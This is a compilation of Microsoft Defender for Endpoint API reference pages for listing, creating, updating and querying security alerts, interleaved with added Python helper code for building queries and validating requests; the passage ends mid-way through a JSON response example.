Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of Alerts.

Supports OData V4 queries.

OData supported operators:

- $filter on: alertCreationTime, lastUpdateTime, incidentId, investigationId, id, assignedTo, detectionSource, lastEventTime, status, severity, and category properties.
- $top with max value of 10,000
- $skip
- $expand of evidence

See examples at OData queries with Microsoft Defender for Endpoint.

Limitations
1. You can get alerts last updated according to your configured retention period.

2. Maximum page size is 10,000.

3. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.Read.All | Read all alerts
Application | Alert.ReadWrite.All | Read and write all alerts
Delegated (work or school account) | Alert.Read | Read alerts
Delegated (work or school account) | Alert.ReadWrite | Read and write alerts

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: View Data (see Create and manage roles for more information).
- The response includes only alerts that are associated with devices that the user can access, based on device group settings (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP
GET /api/alerts

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, and a list of alert objects in the response
body.

Example 1 - Default

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/alerts

Response
Here's an example of the response.

Note

The response list shown here may be truncated for brevity. All alerts will be returned from an actual call.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Alerts",
"value": [
{
"id": "da637308392288907382_-880718168",
"incidentId": 7587,
"investigationId": 723156,
"assignedTo": "secop123@contoso.com",
"severity": "Low",
"status": "New",
"classification": "TruePositive",
"determination": null,
"investigationState": "Queued",
"detectionSource": "WindowsDefenderAv",
"category": "SuspiciousActivity",
"threatFamilyName": "Meterpreter",
"title": "Suspicious 'Meterpreter' behavior was detected",
"description": "Malware and unwanted software are undesirable
applications that perform annoying, disruptive, or harmful actions on
affected machines. Some of these undesirable applications can replicate and
spread from one machine to another. Others are able to receive commands from
remote attackers and perform activities associated with cyber attacks.\n\nA
malware is considered active if it is found running on the machine or it
already has persistence mechanisms in place. Active malware detections are
assigned higher severity ratings.\n\nBecause this malware was active, take
precautionary measures and check for residual signs of infection.",
"alertCreationTime": "2020-07-20T10:53:48.7657932Z",
"firstEventTime": "2020-07-20T10:52:17.6654369Z",
"lastEventTime": "2020-07-20T10:52:18.1362905Z",
"lastUpdateTime": "2020-07-20T10:53:50.19Z",
"resolvedTime": null,
"machineId": "12ee6dd8c833c8a052ea231ec1b19adaf497b625",
"computerDnsName": "temp123.middleeast.corp.microsoft.com",
"rbacGroupName": "MiddleEast",
"aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
"threatName": null,
"mitreTechniques": [
"T1064",
"T1085",
"T1220"
],
"relatedUser": {
"userName": "temp123",
"domainName": "DOMAIN"
},
"comments": [
{
"comment": "test comment for docs",
"createdBy": "secop123@contoso.com",
"createdTime": "2020-07-21T01:00:37.8404534Z"
}
],
"evidence": []
}
...
]
}

Example 2 - Get 10 latest Alerts with related Evidence

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/alerts?$top=10&$expand=evidence

Response
Here's an example of the response.

Note

The response list shown here may be truncated for brevity. All alerts will be returned from an actual call.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Alerts",
"value": [
{
"id": "da637472900382838869_1364969609",
"incidentId": 1126093,
"investigationId": null,
"assignedTo": null,
"severity": "Low",
"status": "New",
"classification": null,
"determination": null,
"investigationState": "Queued",
"detectionSource": "WindowsDefenderAtp",
"detectorId": "17e10bbc-3a68-474a-8aad-faef14d43952",
"category": "Execution",
"threatFamilyName": null,
"title": "Low-reputation arbitrary code executed by signed
executable",
"description": "Binaries signed by Microsoft can be used to run
low-reputation arbitrary code. This technique hides the execution of
malicious code within a trusted process. As a result, the trusted process
might exhibit suspicious behaviors, such as opening a listening port or
connecting to a command-and-control (C&C) server.",
"alertCreationTime": "2021-01-26T20:33:57.7220239Z",
"firstEventTime": "2021-01-26T20:31:32.9562661Z",
"lastEventTime": "2021-01-26T20:31:33.0577322Z",
"lastUpdateTime": "2021-01-26T20:33:59.2Z",
"resolvedTime": null,
"machineId": "111e6dd8c833c8a052ea231ec1b19adaf497b625",
"computerDnsName": "temp123.middleeast.corp.microsoft.com",
"rbacGroupName": "A",
"aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
"threatName": null,
"mitreTechniques": [
"T1064",
"T1085",
"T1220"
],
"relatedUser": {
"userName": "temp123",
"domainName": "DOMAIN"
},
"comments": [
{
"comment": "test comment for docs",
"createdBy": "secop123@contoso.com",
"createdTime": "2021-01-26T01:00:37.8404534Z"
}
],
"evidence": [
{
"entityType": "User",
"evidenceCreationTime": "2021-01-26T20:33:58.42Z",
"sha1": null,
"sha256": null,
"fileName": null,
"filePath": null,
"processId": null,
"processCommandLine": null,
"processCreationTime": null,
"parentProcessId": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"ipAddress": null,
"url": null,
"registryKey": null,
"registryHive": null,
"registryValueType": null,
"registryValue": null,
"accountName": "name",
"domainName": "DOMAIN",
"userSid": "S-1-5-21-11111607-1111760036-109187956-
75141",
"aadUserId": "11118379-2a59-1111-ac3c-a51eb4a3c627",
"userPrincipalName": "temp123@microsoft.com",
"detectionStatus": null
},
{
"entityType": "Process",
"evidenceCreationTime": "2021-01-26T20:33:58.6133333Z",
"sha1": "ff836cfb1af40252bd2a2ea843032e99a5b262ed",
"sha256":
"a4752c71d81afd3d5865d24ddb11a6b0c615062fcc448d24050c2172d2cbccd6",
"fileName": "rundll32.exe",
"filePath": "C:\\Windows\\SysWOW64",
"processId": 3276,
"processCommandLine": "rundll32.exe
c:\\temp\\suspicious.dll,RepeatAfterMe",
"processCreationTime": "2021-01-26T20:31:32.9581596Z",
"parentProcessId": 8420,
"parentProcessCreationTime": "2021-01-
26T20:31:32.9004163Z",
"parentProcessFileName": "rundll32.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"ipAddress": null,
"url": null,
"registryKey": null,
"registryHive": null,
"registryValueType": null,
"registryValue": null,
"accountName": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
"userPrincipalName": null,
"detectionStatus": "Detected"
},
{
"entityType": "File",
"evidenceCreationTime": "2021-01-26T20:33:58.42Z",
"sha1": "8563f95b2f8a284fc99da44500cd51a77c1ff36c",
"sha256":
"dc0ade0c95d6db98882bc8fa6707e64353cd6f7767ff48d6a81a6c2aef21c608",
"fileName": "suspicious.dll",
"filePath": "c:\\temp",
"processId": null,
"processCommandLine": null,
"processCreationTime": null,
"parentProcessId": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"ipAddress": null,
"url": null,
"registryKey": null,
"registryHive": null,
"registryValueType": null,
"registryValue": null,
"accountName": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
"userPrincipalName": null,
"detectionStatus": "Detected"
}
]
},
...
]
}
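As an added example (not Microsoft's code, and not part of the article), a small Python client for the List alerts API: it builds OData queries limited to the documented $filter properties and $top ceiling, pages with $skip, and flattens the Process and File evidence from $expand=evidence into triage records. The HTTP transport is injected and a constructed sample response stands in for the service, so it runs offline.

```python
"""Added example, not Microsoft's code: a client-side helper for the List
alerts API.  Builds OData queries limited to the documented $filter
properties and $top ceiling, pages with $skip, and flattens Process/File
evidence into triage records.  Runs offline against constructed pages."""
from typing import Callable, Dict, Iterator, List
from urllib.parse import parse_qs, quote, urlencode, urlparse

BASE_URL = "https://api.securitycenter.microsoft.com/api/alerts"
MAX_TOP = 10_000  # documented maximum page size
FILTERABLE = {    # properties the article lists as supported by $filter
    "alertCreationTime", "lastUpdateTime", "incidentId", "investigationId",
    "id", "assignedTo", "detectionSource", "lastEventTime", "status",
    "severity", "category",
}


def build_alerts_url(filters: Dict[str, str], top: int = 100, skip: int = 0,
                     expand_evidence: bool = False) -> str:
    """Return a List alerts URL.  ``filters`` maps a property to an OData
    comparison, e.g. {"severity": "eq 'High'"}.  Unknown properties and an
    out-of-range $top are rejected locally instead of sending a bad query."""
    unknown = set(filters) - FILTERABLE
    if unknown:
        raise ValueError(f"not a $filter property: {sorted(unknown)}")
    if not 1 <= top <= MAX_TOP:
        raise ValueError(f"$top must be between 1 and {MAX_TOP}")
    params: Dict[str, str] = {}
    if filters:
        params["$filter"] = " and ".join(
            f"{prop} {expr}" for prop, expr in sorted(filters.items()))
    params["$top"] = str(top)
    if skip:
        params["$skip"] = str(skip)
    if expand_evidence:
        params["$expand"] = "evidence"
    # quote (not quote_plus) so spaces become %20; keep OData's $ : ' readable
    query = urlencode(params, safe="$:'", quote_via=quote)
    return f"{BASE_URL}?{query}"


def iter_alerts(fetch: Callable[[str], dict], filters: Dict[str, str],
                page_size: int = 100) -> Iterator[dict]:
    """Yield every matching alert, advancing $skip until a short page marks
    the end.  ``fetch`` does the authenticated GET and returns the decoded
    JSON body; a real caller also honours the 100 calls/minute limit."""
    skip = 0
    while True:
        page = fetch(build_alerts_url(filters, page_size, skip, True))
        alerts = page.get("value", [])
        yield from alerts
        if len(alerts) < page_size:
            return
        skip += page_size


def executable_evidence(alert: dict) -> List[dict]:
    """Flatten the Process and File evidence of one alert into what an
    analyst checks first; User entities are skipped."""
    records = []
    for ev in alert.get("evidence", []):
        if ev.get("entityType") not in ("Process", "File"):
            continue
        records.append({
            "type": ev["entityType"],
            "file": ev.get("fileName"),
            "path": ev.get("filePath"),
            "sha256": ev.get("sha256"),
            "commandLine": ev.get("processCommandLine"),
            "detected": ev.get("detectionStatus") == "Detected",
        })
    return records


# Constructed sample pages (not real API output), shaped like the response
# above: $skip=0 returns two alerts, $skip=2 the last one.
SAMPLE_PAGES = {
    0: {"value": [
        {"id": "alert-1", "severity": "High", "status": "New", "evidence": [
            {"entityType": "User", "accountName": "temp123",
             "detectionStatus": None},
            {"entityType": "Process", "fileName": "rundll32.exe",
             "filePath": "C:\\Windows\\SysWOW64", "sha256": "aa" * 32,
             "processCommandLine":
                 "rundll32.exe c:\\temp\\suspicious.dll,RepeatAfterMe",
             "detectionStatus": "Detected"},
            {"entityType": "File", "fileName": "suspicious.dll",
             "filePath": "c:\\temp", "sha256": "bb" * 32,
             "detectionStatus": "Detected"},
        ]},
        {"id": "alert-2", "severity": "High", "status": "New", "evidence": []},
    ]},
    2: {"value": [{"id": "alert-3", "severity": "High", "status": "New",
                  "evidence": []}]},
}


def fake_fetch(url: str) -> dict:
    """Offline stand-in for the authenticated GET: serve the constructed page
    selected by the $skip value in the query string."""
    skip = int(parse_qs(urlparse(url).query).get("$skip", ["0"])[0])
    return SAMPLE_PAGES.get(skip, {"value": []})
```

A real fetch adds the Authorization: Bearer header and should throttle to the documented 100 calls per minute.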

See also
OData queries with Microsoft Defender for Endpoint


Create alert API
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Creates a new Alert on top of an Event.

- A Microsoft Defender for Endpoint Event is required for the alert creation.
- You need to supply three parameters from the Event in the request: Event Time, Machine ID, and Report ID. See the example below.
- You can use an event found in the Advanced Hunting API or Portal.
- If an open alert with the same Title already exists on the same Device, the newly created alert is merged with it.
- An automated investigation starts automatically on alerts created via the API.

Limitations
1. Rate limitations for this API are 15 calls per minute.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: Alerts investigation. For more information, see Create and manage roles.
- The user needs to have access to the device associated with the alert, based on device group settings. For more information, see Create and manage device groups.

Device Group creation is supported in both Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/alerts/CreateAlertByReference

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.

Request body
In the request body, supply the following values (all are required):

Property | Type | Description
eventTime | DateTime(UTC) | The precise time of the event as string, as obtained from advanced hunting. For example, 2018-08-03T16:45:21.7115183Z. Required.
reportId | String | The reportId of the event, as obtained from advanced hunting. Required.
machineId | String | Id of the device on which the event was identified. Required.
severity | String | Severity of the alert. The property values are: 'Low', 'Medium' and 'High'. Required.
title | String | Title for the alert. Required.
description | String | Description of the alert. Required.
recommendedAction | String | The action a security officer needs to take when analyzing the alert. Required.
category | String | Category of the alert. The property values are: "General", "CommandAndControl", "Collection", "CredentialAccess", "DefenseEvasion", "Discovery", "Exfiltration", "Exploit", "Execution", "InitialAccess", "LateralMovement", "Malware", "Persistence", "PrivilegeEscalation", "Ransomware", "SuspiciousActivity". Required.

Response
If successful, this method returns 200 OK, and a new alert object in the response body. If an event with the specified properties (reportId, eventTime and machineId) wasn't found, 404 Not Found is returned.

Example

Request
Here's an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/alerts/CreateAlertByReference

JSON

{
"machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"severity": "Low",
"title": "example",
"description": "example alert",
"recommendedAction": "nothing",
"eventTime": "2018-08-03T16:45:21.7115183Z",
"reportId": "20776",
"category": "Exploit"
}
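As an added example for the Create alert API (not Microsoft's code, and not part of the article), a Python helper that assembles and validates the CreateAlertByReference body from an advanced hunting result row before it is sent. The column names Timestamp, DeviceId and ReportId are assumed here to be where the three reference values come from, and the event row is constructed.

```python
"""Added example, not Microsoft's code: assemble and validate a
CreateAlertByReference body from an advanced hunting result row.  The row
columns Timestamp, DeviceId and ReportId are assumed to carry the event
time, machine ID and report ID that the API matches the event on."""
import re

SEVERITIES = ("Low", "Medium", "High")
CATEGORIES = ("General", "CommandAndControl", "Collection", "CredentialAccess",
              "DefenseEvasion", "Discovery", "Exfiltration", "Exploit",
              "Execution", "InitialAccess", "LateralMovement", "Malware",
              "Persistence", "PrivilegeEscalation", "Ransomware",
              "SuspiciousActivity")
# The event is looked up by (reportId, eventTime, machineId), so the time
# must go back exactly as advanced hunting returned it: UTC, optional
# fractional seconds up to 7 digits, trailing Z.  A reformatted value does
# not match and the API answers 404 Not Found.
EVENT_TIME = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(\.\d{1,7})?Z$")


def build_create_alert_body(event: dict, *, title: str, description: str,
                            recommended_action: str, severity: str,
                            category: str) -> dict:
    """Return the JSON body for POST /api/alerts/CreateAlertByReference.
    Raises ValueError for a missing field or an undocumented enum value."""
    if severity not in SEVERITIES:
        raise ValueError(f"severity must be one of {SEVERITIES}")
    if category not in CATEGORIES:
        raise ValueError(f"undocumented category {category!r}")
    event_time = str(event.get("Timestamp", ""))
    if not EVENT_TIME.match(event_time):
        raise ValueError(f"eventTime {event_time!r} is not a UTC timestamp")
    body = {
        "machineId": str(event.get("DeviceId", "")),
        "severity": severity,
        "title": title,
        "description": description,
        "recommendedAction": recommended_action,
        "eventTime": event_time,
        # ReportId is numeric in advanced hunting; the API wants a string
        "reportId": str(event.get("ReportId", "")),
        "category": category,
    }
    missing = [key for key, value in body.items() if not value]
    if missing:
        raise ValueError(f"all properties are required; missing {missing}")
    return body


# Constructed advanced hunting row (not real data); the machine ID and
# report ID are the ones used in the request example above.
SAMPLE_EVENT = {
    "Timestamp": "2018-08-03T16:45:21.7115183Z",
    "DeviceId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
    "ReportId": 20776,
    "ActionType": "ProcessCreated",
}
```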


Batch update alerts
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Updates properties of a batch of existing Alerts.

Submission of comment is available with or without updating properties.

Updatable properties are: status, determination, classification, and assignedTo.

Limitations
1. You can update alerts that are available in the API. For more information, see List Alerts.
2. Rate limitations for this API are 10 calls per minute and 500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Alerts investigation'. For more information, see Create and manage roles.
- The user needs to have access to the device associated with the alert, based on device group settings. For more information, see Create and manage device groups.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST /api/alerts/batchUpdate

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.

Request body
In the request body, supply the IDs of the alerts to be updated and the values of the relevant fields that you wish to update for these alerts.

Existing properties that aren't included in the request body will maintain their previous values or be recalculated based on changes to other property values.

For best performance, you shouldn't include existing values that haven't changed.

Property | Type | Description
alertIds | List<String> | A list of the IDs of the alerts to be updated. Required.
status | String | Specifies the updated status of the specified alerts. The property values are: 'New', 'InProgress' and 'Resolved'.
assignedTo | String | Owner of the specified alerts.
classification | String | Specifies the classification of the specified alerts. The property values are: TruePositive, InformationalExpectedActivity, and FalsePositive.
determination | String | Specifies the determination of the specified alerts. Possible determination values for each classification are:
    True positive: Multistage attack (MultiStagedAttack), Malicious user activity (MaliciousUserActivity), Compromised account (CompromisedUser) – consider changing the enum name in public api accordingly, Malware (Malware), Phishing (Phishing), Unwanted software (UnwantedSoftware), and Other (Other).
    Informational, expected activity: Security test (SecurityTesting), Line-of-business application (LineOfBusinessApplication), Confirmed activity (ConfirmedUserActivity) - consider changing the enum name in public api accordingly, and Other (Other).
    False positive: Not malicious (Clean) - consider changing the enum name in public api accordingly, Not enough data to validate (InsufficientData), and Other (Other).
comment | String | Comment to be added to the specified alerts.

Note

Around August 29, 2022, previously supported alert determination values ('Apt' and 'SecurityPersonnel') will be deprecated and no longer available via the API.

Response
If successful, this method returns 200 OK, with an empty response body.

Example

Request
Here's an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/alerts/batchUpdate

JSON

{
"alertIds": ["da637399794050273582_760707377",
"da637399989469816469_51697947354"],
"status": "Resolved",
"assignedTo": "secop2@contoso.com",
"classification": "FalsePositive",
"determination": "Malware",
"comment": "Resolve my alert and assign to secop2"
}


Update alert
Article • 11/17/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Updates properties of existing Alert.

Submission of comment is available with or without updating properties.

Updatable properties are: status, determination, classification, and assignedTo.

Limitations
1. You can update alerts that are available in the API. For more information, see List Alerts.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Alerts investigation' (for more information, see Create and manage roles).
- The user needs to have access to the device associated with the alert, based on device group settings (for more information, see Create and manage device groups).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

PATCH /api/alerts/{id}

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.


Request body
In the request body, supply the values for the relevant fields that should be updated.

Existing properties that aren't included in the request body will maintain their previous values or be recalculated based on changes to other property values.

For best performance, you shouldn't include existing values that haven't changed.

Property | Type | Description
status | String | Specifies the current status of the alert. The property values are: 'New', 'InProgress' and 'Resolved'.
assignedTo | String | Owner of the alert.
classification | String | Specifies the classification of the alert. The property values are: TruePositive, InformationalExpectedActivity, and FalsePositive.
determination | String | Specifies the determination of the alert. Possible determination values for each classification are:
    True positive: Multistage attack (MultiStagedAttack), Malicious user activity (MaliciousUserActivity), Compromised account (CompromisedUser) – consider changing the enum name in public api accordingly, Malware (Malware), Phishing (Phishing), Unwanted software (UnwantedSoftware), and Other (Other).
    Informational, expected activity: Security test (SecurityTesting), Line-of-business application (LineOfBusinessApplication), Confirmed activity (ConfirmedActivity) - consider changing the enum name in public api accordingly, and Other (Other).
    False positive: Not malicious (NotMalicious) - consider changing the enum name in public api accordingly, Not enough data to validate (InsufficientData), and Other (Other).
comment | String | Comment to be added to the alert.

Note

Around August 29, 2022, previously supported alert determination values ('Apt' and 'SecurityPersonnel') will be deprecated and no longer available via the API.

Response
If successful, this method returns 200 OK, and the alert entity in the response body with the updated properties. If an alert with the specified ID wasn't found, 404 Not Found is returned.

Example

Request
Here's an example of the request.

HTTP

PATCH https://api.securitycenter.microsoft.com/api/alerts/121688558380765161_2136280442

JSON

{
"status": "Resolved",
"assignedTo": "secop2@contoso.com",
"classification": "FalsePositive",
"determination": "Malware",
"comment": "Resolve my alert and assign to secop2"
}
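As an added example (not Microsoft's code, and not part of either article) serving both the Batch update alerts and Update alert articles above, a Python helper that checks a classification/determination pair against the documented table and assembles the request body for PATCH /api/alerts/{id} or, when alertIds is given, POST /api/alerts/batchUpdate. The two articles spell two determinations differently (Clean/NotMalicious, ConfirmedUserActivity/ConfirmedActivity), so both spellings are accepted.

```python
"""Added example, not Microsoft's code: validate the classification /
determination pair and build the body for PATCH /api/alerts/{id} (single
alert) or POST /api/alerts/batchUpdate (when alert IDs are given)."""
from typing import Dict, Iterable, Optional, Set

STATUSES = ("New", "InProgress", "Resolved")
# Determination values the articles list under each classification.  Both
# spellings of the two values the articles disagree on are accepted.
DETERMINATIONS: Dict[str, Set[str]] = {
    "TruePositive": {"MultiStagedAttack", "MaliciousUserActivity",
                     "CompromisedUser", "Malware", "Phishing",
                     "UnwantedSoftware", "Other"},
    "InformationalExpectedActivity": {"SecurityTesting",
                                      "LineOfBusinessApplication",
                                      "ConfirmedUserActivity",
                                      "ConfirmedActivity", "Other"},
    "FalsePositive": {"Clean", "NotMalicious", "InsufficientData", "Other"},
}
DEPRECATED = {"Apt", "SecurityPersonnel"}  # removed from the API in 2022


def build_update_body(*, status: Optional[str] = None,
                      assigned_to: Optional[str] = None,
                      classification: Optional[str] = None,
                      determination: Optional[str] = None,
                      comment: Optional[str] = None,
                      alert_ids: Optional[Iterable[str]] = None) -> dict:
    """Return only the fields being changed, as both articles recommend.
    Raises ValueError for an undocumented value, a deprecated determination,
    or a determination the table does not list under the classification."""
    if status is not None and status not in STATUSES:
        raise ValueError(f"status must be one of {STATUSES}")
    if classification is not None and classification not in DETERMINATIONS:
        raise ValueError(f"unknown classification {classification!r}")
    if determination is not None:
        if determination in DEPRECATED:
            raise ValueError(f"{determination} is no longer available")
        # Without a classification in the same request, accept any value
        # the table lists anywhere; with one, require that row.
        allowed = (DETERMINATIONS[classification] if classification
                   else set().union(*DETERMINATIONS.values()))
        if determination not in allowed:
            raise ValueError(
                f"{determination!r} is not a documented determination for "
                f"{classification or 'any classification'}")
    body: dict = {}
    if alert_ids is not None:
        body["alertIds"] = list(alert_ids)
        if not body["alertIds"]:
            raise ValueError("batch update needs at least one alert ID")
    for key, value in (("status", status), ("assignedTo", assigned_to),
                       ("classification", classification),
                       ("determination", determination),
                       ("comment", comment)):
        if value is not None:
            body[key] = value
    # A comment alone is a valid request; an empty body (or IDs only) is not.
    if set(body) <= {"alertIds"}:
        raise ValueError("nothing to update: pass a property or a comment")
    return body
```

Note that the request examples above pair classification FalsePositive with determination Malware, a combination the determination table does not list; the check rejects it, so confirm the pair against the table before sending.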


Get alert information by ID API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves specific Alert by its ID.

Limitations
You can get alerts last updated according to your configured retention period.
Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.Read.All | 'Read all alerts'
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.Read | 'Read alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data' (for more information, see Create and manage roles).
- The user needs to have access to the device associated with the alert, based on device group settings (for more information, see Create and manage device groups).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/alerts/{id}

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, and the alert entity in the response body. If an alert with the specified ID wasn't found, 404 Not Found is returned.


Get alert related domain information API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves all domains related to a specific alert.

Limitations
1. You can query on alerts last updated according to your configured retention
period.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | URL.Read.All | 'Read URLs'
Delegated (work or school account) | URL.Read.All | 'Read URLs'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data' (for more information, see Create and manage roles).
- The user needs to have access to the device associated with the alert, based on device group settings (for more information, see Create and manage device groups).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/alerts/{id}/domains

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and the alert and domains exist, 200 OK. If the alert is not found, 404 Not Found.

Example

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/alerts/636688558380765161_2136280442/domains

Response example
Here's an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/$metadata#Domains",
"value": [
{
"host": "www.example.com"
},
{
"host": "www.example2.com"
}
...
]
}


Get alert related files information API
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves all files related to a specific alert.

Limitations
1. You can query on alerts last updated according to your configured retention
period.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | File.Read.All | 'Read file profiles'
Delegated (work or school account) | File.Read.All | 'Read file profiles'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).
- The user needs to have access to the device associated with the alert, based on device group settings (see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/alerts/{id}/files

Request headers
ノ Expand table

Name Type Description

Authorization String Bearer {token}. Required.

Request body
Empty
Response
If successful and alert and files exist - 200 OK. If alert not found - 404 Not Found.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/alerts/636688558380765161_2136280442/files

Response example
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Files",
    "value": [
        {
            "sha1": "f2a00fd2f2de1be0214b8529f1e9f67096c1aa70",
